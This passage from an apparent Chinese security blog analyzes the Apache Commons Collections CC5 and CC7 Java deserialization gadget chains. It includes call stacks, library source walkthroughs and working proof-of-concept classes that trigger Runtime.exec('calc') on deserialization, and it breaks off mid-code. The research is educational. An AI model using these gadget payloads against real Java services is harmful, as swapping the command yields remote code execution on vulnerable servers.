class="hljs-keyword">new</span> ObjectInputStream(<span class="hljs-keyword">new</span> FileInputStream(<br>            <span class="hljs-keyword">new</span> File(<span class="hljs-string">&quot;ser.bin&quot;</span>)));<br>        Object object = (Object) ois.readObject();<br>        System.out.println(<span class="hljs-string">&quot;反序列化成功！&quot;</span>);<br>        <span class="hljs-keyword">return</span> object;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

</br>

<h2 id="Commons-Collections5"><a href="#Commons-Collections5" class="headerlink" title="Commons Collections5"></a>Commons Collections5</h2><h3 id="Gadget-chain-2"><a href="#Gadget-chain-2" class="headerlink" title="Gadget chain"></a>Gadget chain</h3><figure class="highlight reasonml"><table><tr><td class="code"><pre><code class="hljs reasonml"><span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">ObjectInputStream</span>.</span></span>read<span class="hljs-constructor">Object()</span><br>            <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">BadAttributeValueExpException</span>.</span></span>read<span class="hljs-constructor">Object()</span><br>                <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">TiedMapEntry</span>.</span></span><span class="hljs-keyword">to</span><span class="hljs-constructor">String()</span><br>                    <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">LazyMap</span>.</span></span>get<span class="hljs-literal">()</span><br>                        <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">ChainedTransformer</span>.</span></span>transform<span class="hljs-literal">()</span><br>                            <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">ConstantTransformer</span>.</span></span>transform<span class="hljs-literal">()</span><br>                            <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">InvokerTransformer</span>.</span></span>transform<span class="hljs-literal">()</span><br>                                <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Method</span>.</span></span>invoke<span class="hljs-literal">()</span><br>                                    <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Class</span>.</span></span>get<span class="hljs-constructor">Method()</span><br>                            <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">InvokerTransformer</span>.</span></span>transform<span class="hljs-literal">()</span><br>                                <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Method</span>.</span></span>invoke<span class="hljs-literal">()</span><br>                                    <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Runtime</span>.</span></span>get<span class="hljs-constructor">Runtime()</span><br>                            <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">InvokerTransformer</span>.</span></span>transform<span class="hljs-literal">()</span><br>                                <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Method</span>.</span></span>invoke<span class="hljs-literal">()</span><br>                                    <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Runtime</span>.</span></span>exec<span class="hljs-literal">()</span><br></code></pre></td></tr></table></figure>

<p>我们可以看到这里与CC1链区别就是在前面的readObject，最后是通过LazyMap调用触发的transform</p>
</br>

<h3 id="利用链分析-2"><a href="#利用链分析-2" class="headerlink" title="利用链分析"></a>利用链分析</h3><p>可以看到后半段的写法是一样的</p>
<figure class="highlight java"><table><tr><td class="code"><pre><code class="hljs java">Transformer[] transformers = <span class="hljs-keyword">new</span> Transformer[]&#123;<br>            <span class="hljs-keyword">new</span> ConstantTransformer(Runtime.class),<br>            <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;getMethod&quot;</span>, <span class="hljs-keyword">new</span> Class[]&#123;String.class, Class[].class&#125;, <span class="hljs-keyword">new</span> Object[]&#123;<span class="hljs-string">&quot;getRuntime&quot;</span>,<span class="hljs-keyword">null</span>&#125;),<br>            <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;invoke&quot;</span>, <span class="hljs-keyword">new</span> Class[]&#123;Object.class, Object[].class&#125;, <span class="hljs-keyword">new</span> Object[]&#123;<span class="hljs-keyword">null</span>,<span class="hljs-keyword">null</span>&#125;),<br>            <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;exec&quot;</span>,<span class="hljs-keyword">new</span> Class[]&#123;String.class&#125;,<span class="hljs-keyword">new</span> Object[]&#123;<span class="hljs-string">&quot;calc&quot;</span>&#125;)<br>        &#125;;<br>        ChainedTransformer chainedTransformer = <span class="hljs-keyword">new</span> ChainedTransformer(transformers);<br><br>        HashMap&lt;Object, Object&gt; map = <span class="hljs-keyword">new</span> HashMap();<br><br>        map.put(<span class="hljs-string">&quot;value&quot;</span>,<span class="hljs-string">&quot;bbb&quot;</span>);<br>        Map&lt;Object, Object&gt; transformedMap = TransformedMap.decorate(map,<span class="hljs-keyword">null</span>,chainedTransformer);<br></code></pre></td></tr></table></figure>

<p>首先是BadAttributeValueExpException类，由于没有继承Serializable</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220309095102.png" alt="img"></p>
<p>可以看到是通过vaobj.toString()，所以我们要对val进行反射传值</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220309094955.png" alt="img"></p>
<p>首先我们要传val进去使他进到TiedMapEntry.toString()，我们先随便new一个TiedMapEntry，先随便传一些参数进来，我们后面看看需要怎么才能满足后面</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220309101831.png" alt="img"></p>
<p>进入getValue方法</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220309102002.png" alt="img"></p>
<p>map传入LazyMap的get方法，key的话我们可以随便传，因为到后面的transform，会将字符串进行覆盖为Runtime.class</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220309102037.png" alt="img"></p>
<p>首先是factory，这个是我们需要执行哪个的transform方法</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220309102340.png" alt="img"></p>
<p>所以key传入的object也就是我们的ChainedTransformer</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220309102521.png" alt="img"></p>
<figure class="highlight reasonml"><table><tr><td class="code"><pre><code class="hljs reasonml">Map decorate = <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">LazyMap</span>.</span></span>decorate(map, chainedTransformer);<br>TiedMapEntry tiedMapEntry = <span class="hljs-keyword">new</span> <span class="hljs-constructor">TiedMapEntry(<span class="hljs-params">decorate</span>,<span class="hljs-string">&quot;123&quot;</span>)</span>;<br></code></pre></td></tr></table></figure>

<p>最终走到这里</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220309102738.png" alt="img"></p>
</br>

<h3 id="POC-2"><a href="#POC-2" class="headerlink" title="POC"></a>POC</h3><p>最终POC</p>
<figure class="highlight java"><table><tr><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> ysoserial.test;<br><br><span class="hljs-keyword">import</span> org.apache.commons.collections.Transformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.keyvalue.TiedMapEntry;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.map.LazyMap;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.map.TransformedMap;<br><br><span class="hljs-keyword">import</span> javax.management.BadAttributeValueExpException;<br><span class="hljs-keyword">import</span> java.io.*;<br><span class="hljs-keyword">import</span> java.lang.reflect.Field;<br><span class="hljs-keyword">import</span> java.util.HashMap;<br><span class="hljs-keyword">import</span> java.util.Map;<br><br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Test5</span> </span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception</span>&#123;<br>        Transformer[] transformers = <span class="hljs-keyword">new</span> Transformer[]&#123;<br>            <span class="hljs-keyword">new</span> ConstantTransformer(Runtime.class),<br>            <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;getMethod&quot;</span>, <span class="hljs-keyword">new</span> Class[]&#123;String.class, Class[].class&#125;, <span class="hljs-keyword">new</span> Object[]&#123;<span class="hljs-string">&quot;getRuntime&quot;</span>,<span class="hljs-keyword">null</span>&#125;),<br>            <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;invoke&quot;</span>, <span class="hljs-keyword">new</span> Class[]&#123;Object.class, Object[].class&#125;, <span class="hljs-keyword">new</span> Object[]&#123;<span class="hljs-keyword">null</span>,<span class="hljs-keyword">null</span>&#125;),<br>            <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;exec&quot;</span>,<span class="hljs-keyword">new</span> Class[]&#123;String.class&#125;,<span class="hljs-keyword">new</span> Object[]&#123;<span class="hljs-string">&quot;calc&quot;</span>&#125;)<br>        &#125;;<br>        ChainedTransformer chainedTransformer = <span class="hljs-keyword">new</span> ChainedTransformer(transformers);<br><br>        HashMap&lt;Object, Object&gt; map = <span class="hljs-keyword">new</span> HashMap();<br><br>        Map decorate = LazyMap.decorate(map, chainedTransformer);<br><br>        TiedMapEntry tiedMapEntry = <span class="hljs-keyword">new</span> TiedMapEntry(decorate,<span class="hljs-string">&quot;123&quot;</span>);<br><br>        <span class="hljs-comment">//修改val值</span><br>        BadAttributeValueExpException badAttributeValueExpException = <span class="hljs-keyword">new</span> BadAttributeValueExpException(<span class="hljs-number">1</span>);<br>        Class&lt;?&gt; c = Class.forName(<span class="hljs-string">&quot;javax.management.BadAttributeValueExpException&quot;</span>);<br>        Field val = c.getDeclaredField(<span class="hljs-string">&quot;val&quot;</span>);<br>        val.setAccessible(<span class="hljs-keyword">true</span>);<br>        val.set(badAttributeValueExpException,tiedMapEntry);<br><br>        <span class="hljs-comment">//序列化和反序列化</span><br>        serialize(badAttributeValueExpException);<br>        unserialize();<br>    &#125;<br><br>    <span class="hljs-comment">//序列化和反序列化</span><br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">serialize</span><span class="hljs-params">(Object o)</span> <span class="hljs-keyword">throws</span> IOException </span>&#123;<br>        <span class="hljs-comment">// ObjectOutputStream 对象输出流，将Person对象存储到E盘的Person.txt文件中，完成对Person对象的序列化操作</span><br>        ObjectOutputStream oo = <span class="hljs-keyword">new</span> ObjectOutputStream(<span class="hljs-keyword">new</span> FileOutputStream(<span class="hljs-keyword">new</span> File(<span class="hljs-string">&quot;ser.bin&quot;</span>)));<br>        oo.writeObject(o);<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> Object <span class="hljs-title">unserialize</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException </span>&#123;<br>        ObjectInputStream ois = <span class="hljs-keyword">new</span> ObjectInputStream(<span class="hljs-keyword">new</span> FileInputStream(<br>            <span class="hljs-keyword">new</span> File(<span class="hljs-string">&quot;ser.bin&quot;</span>)));<br>        Object object = (Object) ois.readObject();<br>        System.out.println(<span class="hljs-string">&quot;反序列化成功！&quot;</span>);<br>        <span class="hljs-keyword">return</span> object;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

</br>

<h2 id="Commons-Collections7"><a href="#Commons-Collections7" class="headerlink" title="Commons Collections7"></a>Commons Collections7</h2><h3 id="Gadget-chain-3"><a href="#Gadget-chain-3" class="headerlink" title="Gadget chain"></a>Gadget chain</h3><figure class="highlight stylus"><table><tr><td class="code"><pre><code class="hljs stylus">java<span class="hljs-selector-class">.util</span><span class="hljs-selector-class">.Hashtable</span><span class="hljs-selector-class">.readObject</span><br>java<span class="hljs-selector-class">.util</span><span class="hljs-selector-class">.Hashtable</span><span class="hljs-selector-class">.reconstitutionPut</span><br>org<span class="hljs-selector-class">.apache</span><span class="hljs-selector-class">.commons</span><span class="hljs-selector-class">.collections</span><span class="hljs-selector-class">.map</span><span class="hljs-selector-class">.AbstractMapDecorator</span><span class="hljs-selector-class">.equals</span><br>java<span class="hljs-selector-class">.util</span><span class="hljs-selector-class">.AbstractMap</span><span class="hljs-selector-class">.equals</span><br>org<span class="hljs-selector-class">.apache</span><span class="hljs-selector-class">.commons</span><span class="hljs-selector-class">.collections</span><span class="hljs-selector-class">.map</span><span class="hljs-selector-class">.LazyMap</span><span class="hljs-selector-class">.get</span><br>org<span class="hljs-selector-class">.apache</span><span class="hljs-selector-class">.commons</span><span class="hljs-selector-class">.collections</span><span class="hljs-selector-class">.functors</span><span class="hljs-selector-class">.ChainedTransformer</span><span class="hljs-selector-class">.transform</span><br>org<span class="hljs-selector-class">.apache</span><span class="hljs-selector-class">.commons</span><span class="hljs-selector-class">.collections</span><span class="hljs-selector-class">.functors</span><span class="hljs-selector-class">.InvokerTransformer</span><span class="hljs-selector-class">.transform</span><br>java<span class="hljs-selector-class">.lang</span><span class="hljs-selector-class">.reflect</span><span class="hljs-selector-class">.Method</span><span class="hljs-selector-class">.invoke</span><br>sun<span class="hljs-selector-class">.reflect</span><span class="hljs-selector-class">.DelegatingMethodAccessorImpl</span><span class="hljs-selector-class">.invoke</span><br>sun<span class="hljs-selector-class">.reflect</span><span class="hljs-selector-class">.NativeMethodAccessorImpl</span><span class="hljs-selector-class">.invoke</span><br>sun<span class="hljs-selector-class">.reflect</span><span class="hljs-selector-class">.NativeMethodAccessorImpl</span><span class="hljs-selector-class">.invoke0</span><br>java<span class="hljs-selector-class">.lang</span><span class="hljs-selector-class">.Runtime</span>.exec<br></code></pre></td></tr></table></figure>

</br>

<p>CC7仍是使用LazyMap来构造利用链，不同的是CC7使用了新的链Hashtable来触发LazyMap利用链，最终导致利用代码</p>
</br>

<h3 id="前置知识-1"><a href="#前置知识-1" class="headerlink" title="前置知识"></a>前置知识</h3><p>序列化过程</p>
<figure class="highlight java"><table><tr><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title">readObject</span><span class="hljs-params">(java.io.ObjectInputStream s)</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException </span>&#123;<br>    <span class="hljs-comment">// Read in the length, threshold, and loadfactor</span><br>    s.defaultReadObject();<br> <br>    <span class="hljs-comment">// 读取table数组的容量</span><br>    <span class="hljs-keyword">int</span> origlength = s.readInt();<br>	<span class="hljs-comment">//读取table数组的元素个数</span><br>    <span class="hljs-keyword">int</span> elements = s.readInt();<br> <br>	<span class="hljs-comment">//计算table数组的length</span><br>    <span class="hljs-keyword">int</span> length = (<span class="hljs-keyword">int</span>)(elements * loadFactor) + (elements / <span class="hljs-number">20</span>) + <span class="hljs-number">3</span>;<br>    <span class="hljs-keyword">if</span> (length &gt; elements &amp;&amp; (length &amp; <span class="hljs-number">1</span>) == <span class="hljs-number">0</span>)<br>        length--;<br>    <span class="hljs-keyword">if</span> (origlength &gt; <span class="hljs-number">0</span> &amp;&amp; length &gt; origlength)<br>        length = origlength;<br>	<span class="hljs-comment">//根据length创建table数组</span><br>    table = <span class="hljs-keyword">new</span> Entry&lt;?,?&gt;[length];<br>    threshold = (<span class="hljs-keyword">int</span>)Math.min(length * loadFactor, MAX_ARRAY_SIZE + <span class="hljs-number">1</span>);<br>    count = <span class="hljs-number">0</span>;<br> <br>	<span class="hljs-comment">//反序列化，还原table数组</span><br>    <span class="hljs-keyword">for</span> (; elements &gt; <span class="hljs-number">0</span>; elements--) &#123;<br>        <span class="hljs-meta">@SuppressWarnings(&quot;unchecked&quot;)</span><br>            K key = (K)s.readObject();<br>        <span class="hljs-meta">@SuppressWarnings(&quot;unchecked&quot;)</span><br>            V value = (V)s.readObject();<br>        reconstitutionPut(table, key, value);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>Hashtable有一个Entry []类型的table属性，并且还是一个数组，用于存放元素（键值对）。Hashtable在序列化时会先把table数组的容量写入到序列化流中，再写入table数组中的元素个数，然后将table数组中的元素取出写入到序列化流中。</p>
</br>

<p>反序列化过程</p>
<figure class="highlight java"><table><tr><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title">readObject</span><span class="hljs-params">(java.io.ObjectInputStream s)</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException </span>&#123;<br>       <span class="hljs-comment">// Read in the length, threshold, and loadfactor</span><br>       s.defaultReadObject();<br><br>       <span class="hljs-comment">// 读取table数组的容量</span><br>       <span class="hljs-keyword">int</span> origlength = s.readInt();<br>	<span class="hljs-comment">//读取table数组的元素个数</span><br>       <span class="hljs-keyword">int</span> elements = s.readInt();<br><br>	<span class="hljs-comment">//计算table数组的length</span><br>       <span class="hljs-keyword">int</span> length = (<span class="hljs-keyword">int</span>)(elements * loadFactor) + (elements / <span class="hljs-number">20</span>) + <span class="hljs-number">3</span>;<br>       <span class="hljs-keyword">if</span> (length &gt; elements &amp;&amp; (length &amp; <span class="hljs-number">1</span>) == <span class="hljs-number">0</span>)<br>           length--;<br>       <span class="hljs-keyword">if</span> (origlength &gt; <span class="hljs-number">0</span> &amp;&amp; length &gt; origlength)<br>           length = origlength;<br>	<span class="hljs-comment">//根据length创建table数组</span><br>       table = <span class="hljs-keyword">new</span> Entry&lt;?,?&gt;[length];<br>       threshold = (<span class="hljs-keyword">int</span>)Math.min(length * loadFactor, MAX_ARRAY_SIZE + <span class="hljs-number">1</span>);<br>       count = <span class="hljs-number">0</span>;<br><br>	<span class="hljs-comment">//反序列化，还原table数组</span><br>       <span class="hljs-keyword">for</span> (; elements &gt; <span class="hljs-number">0</span>; elements--) &#123;<br>           <span class="hljs-meta">@SuppressWarnings(&quot;unchecked&quot;)</span><br>               K key = (K)s.readObject();<br>           <span class="hljs-meta">@SuppressWarnings(&quot;unchecked&quot;)</span><br>               V value = (V)s.readObject();<br>           reconstitutionPut(table, key, value);<br>       &#125;<br>   &#125;<br></code></pre></td></tr></table></figure>

<p>Hashtable会先从反序列化流中读取table数组的容量和元素个数，并根据origlength 和elements 计算出table数组的length，再根据计算得到的length来创建table数组（origlength 和elements可以决定table数组的大小），然后从反序列化流中依次读取每个元素，然后调用reconstitutionPut方法将元素重新放入table数组（Hashtable的table属性），最终完成反序列化。</p>
</br>

<hr>
</br>

<p>reconstitutionPut方法是一个很重要的方法，我们进一步分析一下这个方法</p>
<p>reconstitutionPut方法首先对value进行不为null的校验，否则抛出反序列化异常，然后根据key计算出元素在table数组中的存储索引，判断元素在table数组中是否重复，如果重复则抛出异常，如果不重复则将元素转换成Entry并添加到tabl数组中。</p>
<figure class="highlight java"><table><tr><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title">reconstitutionPut</span><span class="hljs-params">(Entry&lt;?,?&gt;[] tab, K key, V value)</span> <span class="hljs-keyword">throws</span> StreamCorruptedException </span>&#123;<br>	<span class="hljs-comment">//value不能为null</span><br>       <span class="hljs-keyword">if</span> (value == <span class="hljs-keyword">null</span>) &#123;<br>           <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> java.io.StreamCorruptedException();<br>       &#125;<br><br>	<span class="hljs-comment">//重新计算key的hash值</span><br>       <span class="hljs-keyword">int</span> hash = key.hashCode();<br>	<span class="hljs-comment">//根据hash值计算存储索引</span><br>       <span class="hljs-keyword">int</span> index = (hash &amp; <span class="hljs-number">0x7FFFFFFF</span>) % tab.length;<br>	<span class="hljs-comment">//判断元素的key是否重复</span><br>       <span class="hljs-keyword">for</span> (Entry&lt;?,?&gt; e = tab[index] ; e != <span class="hljs-keyword">null</span> ; e = e.next) &#123;<br>		<span class="hljs-comment">//如果key重复则抛出异常</span><br>           <span class="hljs-keyword">if</span> ((e.hash == hash) &amp;&amp; e.key.equals(key)) &#123;<br>               <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> java.io.StreamCorruptedException();<br>           &#125;<br>       &#125;<br>       <span class="hljs-comment">//key不重复则将元素添加到table数组中</span><br>       <span class="hljs-meta">@SuppressWarnings(&quot;unchecked&quot;)</span><br>           Entry&lt;K,V&gt; e = (Entry&lt;K,V&gt;)tab[index];<br>       tab[index] = <span class="hljs-keyword">new</span> Entry&lt;&gt;(hash, key, value, e);<br>       count++;<br>   &#125;<br></code></pre></td></tr></table></figure>

<p>CC7利用链的漏洞触发的关键就在reconstitutionPut方法中，该方法在判断重复元素的时候校验了两个元素的hash值是否一样，然后接着key会调用equals方法判断key是否重复时就会触发漏洞</p>
</br>

<h3 id="利用链分析-3"><a href="#利用链分析-3" class="headerlink" title="利用链分析"></a>利用链分析</h3><p>前部分的poc都是一样的</p>
<figure class="highlight pgsql"><table><tr><td class="code"><pre><code class="hljs pgsql">Transformer[] transformers = <span class="hljs-built_in">new</span> Transformer[]&#123;<br>    <span class="hljs-built_in">new</span> ConstantTransformer(Runtime.<span class="hljs-keyword">class</span>),<br>    <span class="hljs-built_in">new</span> InvokerTransformer(&quot;getMethod&quot;, <span class="hljs-built_in">new</span> <span class="hljs-keyword">Class</span>[]&#123;String.<span class="hljs-keyword">class</span>, <span class="hljs-keyword">Class</span>[].<span class="hljs-keyword">class</span>&#125;, <span class="hljs-built_in">new</span> <span class="hljs-keyword">Object</span>[]&#123;&quot;getRuntime&quot;,<span class="hljs-keyword">null</span>&#125;),<br>    <span class="hljs-built_in">new</span> InvokerTransformer(&quot;invoke&quot;, <span class="hljs-built_in">new</span> <span class="hljs-keyword">Class</span>[]&#123;<span class="hljs-keyword">Object</span>.<span class="hljs-keyword">class</span>, <span class="hljs-keyword">Object</span>[].<span class="hljs-keyword">class</span>&#125;, <span class="hljs-built_in">new</span> <span class="hljs-keyword">Object</span>[]&#123;<span class="hljs-keyword">null</span>,<span class="hljs-keyword">null</span>&#125;),<br>    <span class="hljs-built_in">new</span> InvokerTransformer(&quot;exec&quot;,<span class="hljs-built_in">new</span> <span class="hljs-keyword">Class</span>[]&#123;String.<span class="hljs-keyword">class</span>&#125;,<span class="hljs-built_in">new</span> <span class="hljs-keyword">Object</span>[]&#123;&quot;calc&quot;&#125;)<br>&#125;;<br><br>ChainedTransformer chainedTransformer = <span class="hljs-built_in">new</span> ChainedTransformer(transformers);<br></code></pre></td></tr></table></figure>

<p>首先是Hashtable的readObject方法，要想走到下面for循环，我们需要给put元素</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220309145715.png" alt="img"></p>
<figure class="highlight arduino"><table><tr><td class="code"><pre><code class="hljs arduino"><span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-keyword">String</span>[] args)</span> throws Exception </span>&#123;<br>        Hashtable hashtable = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Hashtable</span>();<br>        hashtable.<span class="hljs-built_in">put</span>(<span class="hljs-string">&quot;yy&quot;</span>,<span class="hljs-number">1</span>);<br>        hashtable.<span class="hljs-built_in">put</span>(<span class="hljs-string">&quot;zZ&quot;</span>,<span class="hljs-number">1</span>);<br>    <br>        <span class="hljs-built_in">serialize</span>(hashtable);<br>        <span class="hljs-built_in">unserialize</span>();<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>第一次调用reconstitutionPut时，会把key和value注册进table中，由于tab[index]里并没有内容，所以并不会走进这个for循环内，而是给将key和value注册进tab中。在第二次调用reconstitutionPut时，tab中才有内容，我们才有机会进入到这个for循环中，从而调用equals方法。这也是为什么要调用两次put的原因</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220310142244.png" alt="img"></p>
<p>在后面给tab进行赋值</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220310165324.png" alt="img"></p>
<p>首先是要满足e.hash == hash才能走到判断e.key.equals(key)，这里的e就是我们的传入键的值，该方法在判断重复元素的时候校验了两个元素的hash值是否一样</p>
<p>这里的yy和zZ的hash是一样的，所以传入yy和zZ</p>
</br>

<p>之后我们看下key要如何可控，将第二次传入put的时候，走到LazyMap#equals方法,LazyMap并没有equals方法，LazyMap没有equals方法，那么调用的就是其父类的equals方法</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220310143428.png" alt="img"></p>
<p>因此最终调用HashMap继承的抽象类AbstractMap中的equals方法，我们接下来要走到get方法，想办法调用LazyMap.get上，可以看到AbstractMap#equals(Object o)传入参数o是取决于reconstitutionPut方法中调用e.key.equals(key)方法中传入的key值</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220310143738.png" alt="img"></p>
<p>这里的key值是yy，但是不妨我们调用transform，但是这里是需要给factory传值，这也是为什么前面有decorate对map和factory进行传值</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220310124449.png" alt="img"></p>
<p>这里我们传入的是chainedTransformer，最终走完链</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220310124734.png" alt="img"></p>
<p>为什么最后要remove(“yy”)？</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220310144017.png" alt="img"></p>
<p>为什么要先指定一个fakeTransformers？</p>
<p>因为在序列化的时候会将在第二次put的时候，调用到m.get造成触发</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220310152507.png" alt="img"></p>
</br>

<h3 id="POC-3"><a href="#POC-3" class="headerlink" title="POC"></a>POC</h3><figure class="highlight java"><table><tr><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> ysoserial.test;<br><br><span class="hljs-keyword">import</span> org.apache.commons.collections.Transformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections.map.LazyMap;<br><br><span class="hljs-keyword">import</span> java.io.*;<br><span class="hljs-keyword">import</span> java.lang.reflect.Field;<br><span class="hljs-keyword">import</span> java.util.HashMap;<br><span class="hljs-keyword">import</span> java.util.Hashtable;<br><span class="hljs-keyword">import</span> java.util.Map;<br><br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Test7</span> </span>&#123;<br><br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> IllegalAccessException, NoSuchFieldException, IOException, ClassNotFoundException </span>&#123;<br><br>        Transformer[] fakeTransformers = <span class="hljs-keyword">new</span> Transformer[] &#123;&#125;;<br><br>        Transformer[] transformers = <span class="hljs-keyword">new</span> Transformer[] &#123;<br>            <span class="hljs-keyword">new</span> ConstantTransformer(Runtime.class),<br>            <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;getMethod&quot;</span>, <span class="hljs-keyword">new</span> Class[] &#123;String.class, Class[].class &#125;, <span class="hljs-keyword">new</span> Object[] &#123; <span class="hljs-string">&quot;getRuntime&quot;</span>, <span class="hljs-keyword">new</span> Class[<span class="hljs-number">0</span>] &#125;),<br>            <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;invoke&quot;</span>, <span class="hljs-keyword">new</span> Class[] &#123;Object.class, Object[].class &#125;, <span class="hljs-keyword">new</span> Object[] &#123; <span class="hljs-keyword">null</span>, <span class="hljs-keyword">new</span> Object[<span class="hljs-number">0</span>] &#125;),<br>            <span class="hljs-keyword">new</span> InvokerTransformer(<span class="hljs-string">&quot;exec&quot;</span>, <span class="hljs-keyword">new</span> Class[] &#123; String.class&#125;, <span class="hljs-keyword">new</span> String[] &#123;<span class="hljs-string">&quot;calc.exe&quot;</span>&#125;),<br>        &#125;;<br><br>        Transformer transformerChain = <span class="hljs-keyword">new</span> ChainedTransformer(fakeTransformers);<br>        Map innerMap1 = <span class="hljs-keyword">new</span> HashMap();<br>        Map innerMap2 = <span class="hljs-keyword">new</span> HashMap();<br><br>        Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);<br>        lazyMap1.put(<span class="hljs-string">&quot;yy&quot;</span>, <span class="hljs-number">1</span>);<br><br>        Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);<br>        lazyMap2.put(<span class="hljs-string">&quot;zZ&quot;</span>, <span class="hljs-number">1</span>);<br><br>        Hashtable hashtable = <span class="hljs-keyword">new</span> Hashtable();<br>        hashtable.put(lazyMap1, <span class="hljs-number">1</span>);<br>        hashtable.put(lazyMap2, <span class="hljs-number">2</span>);<br><br>        Field f = ChainedTransformer.class.getDeclaredField(<span class="hljs-string">&quot;iTransformers&quot;</span>);<br>        f.setAccessible(<span class="hljs-keyword">true</span>);<br>        f.set(transformerChain, transformers);<br><br>        lazyMap2.remove(<span class="hljs-string">&quot;yy&quot;</span>);<br>        <span class="hljs-keyword">try</span>&#123;<br>            ObjectOutputStream outputStream = <span 